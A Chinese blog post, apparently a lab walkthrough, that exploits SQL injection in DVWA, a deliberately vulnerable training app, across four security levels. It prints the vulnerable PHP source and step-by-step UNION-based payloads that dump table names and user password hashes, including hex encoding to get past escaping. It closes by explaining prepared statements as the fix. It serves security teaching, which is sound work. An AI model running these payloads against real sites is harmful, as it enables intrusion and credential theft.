DVWA(六) -SQL注入

最新推荐文章于 2024-07-03 09:32:31 发布
最新推荐文章于 2024-07-03 09:32:31 发布
阅读量414 收藏 1
点赞数 2
分类专栏: DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42785117/article/details/100011031
版权

SQL Injection(SQL注入)

原理: 将恶意的sql语句拼接到合法的sql语句中。

类型: 字符型,数字型,搜索型。

注入流程:

  1. 判断是否存在注入,注入是字符型还是数字型。
  2. 猜解sql查询语句中的字段数
  3. 确定显示位置
  4. 获取当前的数据库
  5. 获取数据库中的表
  6. 获取表中的字段名
  7. 下载数据

实验前须知:

  • sql5.0以上版本与5.0以下的版本有个最根本的区别,多了一个information_schema库,其中的tables表中存放数据库中所有的库名和表名。
  • 数据库默认可以识别十六进制,可以以此来绕过.

环境: dvwa搭建在win7 x64系统,IP为:192.168.157.137.

界面:
在这里插入图片描述
通过键入的id值,来确定身份,并回显。且级别不同,提交方式不同。
在这里插入图片描述

Low

Low级别源码

<?php 

if( isset( $_REQUEST[ 'Submit' ] ) ) { 
    // Get input 
    $id = $_REQUEST[ 'id' ]; 

    // Check database 
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    // Get results 
    while( $row = mysqli_fetch_assoc( $result ) ) { 
        // Get values 
        $first = $row["first_name"]; 
        $last  = $row["last_name"]; 

        // Feedback for end user 
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; 
    } 

    mysqli_close($GLOBALS["___mysqli_ston"]); 
} 

?>

分析:
键入id值,点击提交之后,不进行过滤,直接插入到数据库查询语句中。

解决思路:
走一遍sql注入的流程。

进行攻击

  1. 输入 1' 并提交

报错:
在这里插入图片描述
确定此处为注入点

  1. 输入 1' and '1' = '1,正常返回,1' and '1' ='2,无返回结果
    在这里插入图片描述
    在这里插入图片描述
    再次确定了此处为注入点,且注入类型为 字符型

  2. 使用 order by 语句确定字段数,#为sql语法中的注释
    在这里插入图片描述
    在这里插入图片描述

    1' order by 3# 语句报错。
    在这里插入图片描述
    得到字段值为2

  3. 确定显示的位置
    1' union select 1,2#
    在这里插入图片描述
    1位置出现在firstname那一行,2位置出现在Surname那一行

  4. 得到数据库的版本以及使用的库名称。
    1' union select version(),database()#

在这里插入图片描述
若只想看到需要的结果,可以把1改为-1
-1' union select version(),database()#
在这里插入图片描述
得到数据库版本为5.5.53,且库名为dvwa。

  1. 由版本号可以知道,数据库存在information_schema库,可以通过其中的tables表查看当前库下的所有表名。
    -1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #
    在这里插入图片描述
    得到dvwa库下存在guestbook、users两张表,选择看起来比较敏感的users表来获取数据。
  2. 获取目标表中的字段名

-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
在这里插入图片描述
得到users表中的字段名,并且存在user和password这样的敏感信息,获得其中的数据。

  1. 得到其中的数据。
    -1' union select user,password from users#
    在这里插入图片描述
    取得其中md5加密后的密码,查字典得到明文密码。
    在这里插入图片描述

Medium

在这里插入图片描述
界面改为这种下拉菜单式,不允许用户自行输入

Medium级别源码

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . mysqli_connect_error() . '</pre>' );

    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Display values
        $first = $row["first_name"];
        $last  = $row["last_name"];

        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

分析:
在这里插入图片描述

  • 界面改为这种下拉菜单式,不允许用户自行输入
    在这里插入图片描述
  • 使用mysqli_real_escape_string 函数对单双引号等特殊符号进行过滤.
    在这里插入图片描述
  • 由字符型变为数字型

解决思路:

  • 虽然只能在网页中的下拉菜单中选择,但是我们可以在burp中拦截包,修改上传的参数,实际效果与手动输入没有区别。
  • 虽说过滤掉单双引号等特殊字符,但注入类型现在为数字型,不需要单引号来闭合,字符串可以编译为十六进制编码,数据库默认可以识别。

进行攻击

  1. burp拦截包,并将其发送至Repeater模块
    在这里插入图片描述
    在这里插入图片描述

  2. 修改参数为1 and 1=1 1 and 1=2
    在这里插入图片描述
    在这里插入图片描述
    确定了此处为注入点,并且类型为数字型。

  3. 使用 order by 语句确定字段数
    在这里插入图片描述
    在这里插入图片描述

    1 order by 3 语句报错。
    在这里插入图片描述
    得到字段值为2

  4. 确定显示的位置
    -1 union select 1,2
    在这里插入图片描述

  5. 得到数据库的版本以及使用的库名称。
    -1 union select version(),database()#
    在这里插入图片描述
    得到数据库版本为5.5.53,且库名为dvwa。

  6. 由版本号可以知道,数据库存在information_schema库,可以通过其中的tables表查看当前库下的所有表名。
    这里需要注意,因为过滤了表示字符串的单双引号,所以类似LOW级别的’dvwa’,无法通过
    在这里插入图片描述
    所以我们将其编译为16进制,或者是使用database()来代替这里的’dvwa’
    16进制:
    在这里插入图片描述
    在这里插入图片描述
    database():
    在这里插入图片描述

  7. 获取目标表中的字段名
    与dvwa相仿,将users转换为十六进制

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
在这里插入图片描述
得到users表中的字段名。

  1. 得到其中的数据。
    -1 union select user,password from users
    在这里插入图片描述

High

High级别源码

    <?php
    
    if( isset( $_SESSION [ 'id' ] ) ) {
        // Get input
        $id = $_SESSION[ 'id' ];
    
        // Check database
        $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>Something went wrong.</pre>' );
    
        // Get results
        while( $row = mysqli_fetch_assoc( $result ) ) {
            // Get values
            $first = $row["first_name"];
            $last  = $row["last_name"];
    
            // Feedback for end user
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    
        ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
    }
    
    ?>

分析:
看起来简单了很多,甚至没有特殊字符过滤,添加了对输入个数的限制,只允许输入一个,又回到了字符型注入。界面变成了这样:
在这里插入图片描述
解决思路:
这样子点击打开新的界面来输入ID,是为了防止工具的自动化注入(sqlmap等),但是对手动注入影响不大。LIMIT 1,一个小小的#不就可以干掉?。

攻击结果

在这里插入图片描述

切记切记: 在High等级下,若出现错误显示,一定不能关那个小窗口,否则之后都会是这个界面,只能重装DVWA。
在这里插入图片描述

Impossible

Impossible级别源码

    <?php
    
    if( isset( $_GET[ 'Submit' ] ) ) {
        // Check Anti-CSRF token
        checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
    
        // Get input
        $id = $_GET[ 'id' ];
    
        // Was a number entered?
        if(is_numeric( $id )) {
            // Check the database
            $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
            $data->bindParam( ':id', $id, PDO::PARAM_INT );
            $data->execute();
            $row = $data->fetch();
    
            // Make sure only 1 result is returned
            if( $data->rowCount() == 1 ) {
                // Get values
                $first = $row[ 'first_name' ];
                $last  = $row[ 'last_name' ];
    
                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }
        }
    }
    
    // Generate Anti-CSRF token
    generateSessionToken();
    
    ?>

分析:
加了PDO的代码往往就是这么的朴实无华且枯燥无味。
解决思路:
如果有人解决了PDO,请告诉我一声,我愿称其为王!

PDO预处理

普通的sql查询就是一条查询语句,将用户输入的与正常的参数拼接在一起,交给数据库进行查询,就像这篇博客低中高等级dvwa服务器的做法。

但是PDO是将用户输入的与sql语句相分离,语法为:
$pdo->prepare('select * from users where id=:id');

$pdo->execute([':id'=>4]);

服务器会先给数据库发送第一条语句,让数据库进行解析,在将用户输入的当做纯参数传给数据库,就算是恶意的,也不会运行。

我的一些理解:
没有PDO:
我在一栋大楼的一个房子里面,房东告诉我只能呆在这个房子里面,但是在他不注意的时候,我就悄悄溜出去,随意去别的房间转。
有PDO:
我在一个房子里,且这个房子独立于世界。

封梦
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
java 16进制字符10进制_java 16进制字符串怎么换成10进制字符
weixin_42638178的博客
02-12 2254
展开全部toHexStringpublic static String toHexString(inti)以十六进制的无符号整数形式返回一个整数参数的字符串表示形式。如果参数为负,那么无符号整数值为参62616964757a686964616fe4b893e5b19e31333339666132数加上232;否则等于该参数。将该值换为十六进制(基数 16)的无前导 0 的 ASCII 数字字符串...
DVWA使用教程(Brute Force)(一)
ai_64的博客
06-09 2万+
DVWA使用教程(Brute Force)(一) DVWA是一个用来练习Web渗透的PHP应用。共有十个模块,分别是 1.Brute Force(爆破) 2.Command Injection(命令注入) 3.CSRF(跨站请求伪造) 4.File Inclusion(文件包含) 5.File Uplod(文件上传) 6.Insecure CAPTCHA(不安全的验证码) 7.SQL...
[网络安全]DVWASQL注入—medium level解题详析
等风来
04-21 1万+
这行代码使用了PHP内置的 mysqli_real_escape_string() 函数对 $id 变量进行义处理,以防止 SQL 注入攻击。在 Web 应用程序中,当用户在浏览器中提交表单时,浏览器会对数据进行 URL 编码,然后再将编码后的数据发送到后端服务器上。group_concat函数 是 MySQL 中的一个聚集函数,用于将指定列(或表达式)的值以逗号分隔的形式进行拼接。由于字符串’dvwa’中所有的字符均不需要编码,所以URL编码绕过失效。等),剩下的其它所有字符必须通过%xx编码处理。
【网络安全渗透测试零基础入门必知必会】之如何搭建 DVWA 靶场保姆级教程(非常详细)零基础入门到精通,收藏这一篇就够了4
最新发布
Libra1313的博客
07-03 1151
DVWA代表Damn Vulnerable Web Application,是一个用于学习和练习Web应用程序漏洞的开源漏洞应用程序。它被设计成一个易于安装和配置的漏洞应用程序,旨在帮助安全专业人员和爱好者了解和熟悉不同类的Web应用程序漏洞。DVWA提供了一系列的漏洞场景和练习环境,用户可以通过攻击这些漏洞场景来学习和实践漏洞利用技术。这些漏洞包括常见的安全问题,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。通过攻击这些漏洞,用户可以了解漏洞的原理、影响和防御方法。
DVWA简介
live4dream的博客
10-26 4万+
DVWA是一个web安全学习靶场,集成了OWASP Top10的漏洞,用于web安全初学者练习web渗透技巧。
DVWA下载、安装、使用(漏洞测试环境搭建)教程
星如雨落
10-27 4万+
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 一共有十个模块: 暴力(破解)、命令行注入、跨站请求伪造、文件包含、文件上传、不安全的验证码、SQL注入、SQL盲注、弱会话ID、XSS漏洞(DOM跨站脚本、反射跨站脚本、 存储跨站脚本) 环境搭建 由于是本地搭建真实web漏洞网站,我就以Windows
DVWA--SQL注入
xiaoxiao的博客
01-07 3449
SQL注入原理 就是通过sql命令插入到web表单递交或输入域名页面请求的查询字符串,最终达到欺骗服务器执行恶意的SDL命令。具体来说,它是利用现有应用程序,将恶意的SQL命令注入到后台数据库引擎执行的能力,它可以通过在WEB表单中输入恶意SQL语句得到包含漏洞的网站数据库,而不是按照设计者意图去执行。 SQL注入 按照数据提交的方式: GET注入、POST注入、COOKIE注入、HTTP头部...
dvwa】--SQL注入
Nicky_Zheng的博客
08-11 179
为了准备跑路,练习ing。 SQL注入篇 LOW级别 先上源码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysql_query(
DVWA下的SQL注入
07-25
### DVWA下的SQL注入知识点详解 #### 一、SQL注入基础概念 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过这种手段将恶意SQL代码插入到应用程序的查询中,以达到非法访问或篡改数据的目的。在本篇内容中...
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
接着是DVWA,这个应用设计有多个安全漏洞,包括跨站脚本(XSS)、文件包含漏洞、SQL注入等,用于模拟真实世界的网络安全问题。通过DVWA,开发者或安全研究人员可以实践如何发现这些漏洞,并学习如何修复它们。每个...
DVWA-master.zip
01-04
DVWA的"SQL注入"部分,你可以尝试通过构造恶意输入来操纵数据库查询,以获取敏感信息或执行非授权操作。这涵盖了盲注、时间基注入和错误回显等多种方法,有助于理解SQL注入的危害和防御手段。 3. **跨站脚本...
DVWASQL注入详解(包含知识点)
10-20
DVWA(Damn Vulnerable Web Application)的SQL注入(low)级别中,可以学习到多个关于SQL注入的知识点。例如,了解了SQL语句中的"ORDER BY"子句,它用于对查询结果进行排序。"ORDER BY 1"意味着按照第一个字段...
网络安全-实验-SQL注入-基本手工注入.docx
11-10
SQL注入是一种常见的网络安全威胁,它利用了不安全的Web应用程序中的设计缺陷,使得攻击者能够通过构造特定的SQL语句来操纵或访问数据库。在实验中,我们将深入理解并实践这种攻击方式,以提高对网络安全的认识。 ...
DVWA的安装教程和通关详解
路baby的博客
11-27 3万+
DVWA是一款基于PHP和mysql开发的web靶场练习平台,集成了常见的Web漏洞。有详细的DVWA的安装教程,和通关详解
DVWA全级别通关教程
热门推荐
weixin_52515588的博客
03-26 9万+
首先选择难度,我们从low开始,如上图所示进行修改 目录 SQL手工注入 过程: low Medium high Impossible SQL 盲注 过程: SQL 工具注入 工具安装过程: 过程: low Medium High: 暴力破解 过程: Low Medium High Impossible 命令注入 过程: Low Medium High: Impossible 文件上传 过程: Low Medium High Im...
DVWA通关攻略零到一【全】
WX公众号-小白学安全
10-28 4万+
DVWA(Damn Vulnerable Web Application)一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
DVWA平台搭建+SQL注入实验详解
Karka_的博客
08-15 5258
最终目的:得到爆破数据库,得到数据库中的用户名和密码,过程:1)查看页面的传递方式2)判断是否存在注入,注入类是什么3)猜解SQL 查询语句中的字段数4)获取当前数据库名和基本信息5)获取数据库中的表名6)获取表中的字段名7)爆破关键字段的内容(用户名、密码)
dvwa安装和使用指南
weixin_33779515的博客
01-26 2762
---------------------------------------说明本手册作为教学的一部分供大家参考。具体的关于web漏洞的学习大家可以参考《web***测试-常见漏洞解析课程》http://edu.51cto.com/course/course_id-5281.html ---------------------------------------1....
DVWA靶场教程
wxh的博客
01-15 2万+
Burt Force(暴力破解)
DVWA实验:SQL注入入门指南
本资源是一份关于"常规漏洞利用-SQL注入实验指导书"的详细文档。它旨在帮助学习者理解和实践SQL注入这一关键的网络安全概念。实验分为几个步骤,首先,需要在DVWA(Damn Vulnerable Web Application)平台上进行操作...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值